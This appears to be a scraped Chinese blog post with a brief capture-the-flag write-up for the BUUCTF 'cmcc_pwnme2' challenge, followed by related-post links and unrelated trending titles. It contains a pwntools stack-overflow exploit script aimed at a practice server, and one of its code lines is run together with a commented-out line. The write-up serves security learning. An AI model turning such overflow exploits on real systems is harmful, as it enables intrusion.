这个函数相当于打印出文件名为“string”中的文件内容

这个函数相当于在result中加入路径

这个函数同上

我也不太明白这两个函数的作用,这个题目主要是考传参,所以直接给出exp

from pwn import *
context(log_level='debug',arch='amd64',os='linux')
elf=ELF('/home/hacker/Desktop/pwnme2' )
p=remote("node4.buuoj.cn",26215)
#p=process('/home/hacker/Desktop/pwnme2' )p.sendline('a'*(0x6c + 4) + p32(elf.plt['gets']) + p32(0x80485cb) + p32(0x804a060))
p.sendline("flag")
p.interactive()

这就相当于在string中输入路径,然后直接调用exec_string()来获取flag。

cmcc_pwnme2相关推荐

  1. BUUCTF之“cmcc_pwnme2”做题简单记录

    这题还好,值得注意的是IDA里头函数栏里面的函数名字需要多注意其意思,说不定就 是提示的信息. from pwn import *p = remote('node4.buuoj.cn',25488) ...

  2. PWN-PRACTICE-BUUCTF-19

    PWN-PRACTICE-BUUCTF-19 hitcontraining_bamboobox picoctf_2018_shellcode npuctf_2020_easyheap cmcc_pwn ...

  3. 持续更新 BUUCTF——PWN(二)

    文章目录 前言 0ctf_2017_babyheap ciscn_2019_s_9 hitcon2014_stkof roarctf_2019_easy_pwn picoctf_2018_shellc ...

  4. BUUCTF pwn wp 76 - 80

    cmcc_pwnme2 int __cdecl userfunction(char *src) {char dest[108]; // [esp+Ch] [ebp-6Ch] BYREFstrcpy(d ...

最新文章

  1. 有氧运动 无氧运动
  2. IDEA无法通过类加载器获取resources文件夹配置文件解决办法
  3. kohana3 数据库模块配置
  4. 代码运行错误及解决方法
  5. ubuntu 20.04 源码编译 cmake
  6. 小米温控配置不见了_小米11值得买吗?目前看来功耗很高啊?
  7. IS-IS详解(十六)——IS-IS 分片扩展
  8. Struts,Spring,Hibernate三大框架的面试
  9. python自动化框架搭建过程_一步一步教你编写与搭建自动化测试框架——python篇...
  10. Oracle 建表语句,表结构操作sql
  11. SPSS作业-如何判别是否服从正态分布
  12. 吐血推荐一大波让你直呼哇塞的Canvas库
  13. 年度光电领域盛会——CIOE中国光博会开幕在即!小枣君将全程在线直播!
  14. Win10下Flutter开发环境搭建这一篇足矣
  15. 【凝水成冰】记学生事务系统的结构化
  16. 极坐标梯度公式_一种基于极坐标系梯度变化的类圆环边缘检测方法与流程
  17. EventBus Vuex?
  18. Java多word文件生成后进行压缩并导出下载后,压缩文件损坏并提示“不可预料的压缩文件末端”和“CRC校验失败”
  19. ITK-图像主轴分析
  20. matlab里面nargin,Matlab中的nargin命令

热门文章

  1. chatgpt-AI工具
  2. SSL证书常用的加密算法有哪些
  3. 外贸人用远程工具进行跟单的详细操作
  4. 小程序 | 【黑马】本地生活 小程序
  5. 实时获取汇率_Currencylayer实时汇率
  6. GPU编程自学10 —— 流并行
  7. paypal/stripe轮询系统中ab跳转能否被识别?
  8. 【CocosCreator 3.x】使用 UIMeshRenderer 组件实现 3D 渲染在 UI 上 => 攻略
  9. 蒜头君:所谓角谷猜想,是指对于任意一个正整数,如果是奇数,则乘 33 加 11,如果是偶数,则除以 22,得到的结果再按照上述规则重复处理,最终总能够得到 11。如,假定初始整数为 5
  10. 让机器人的学习更有趣的Fable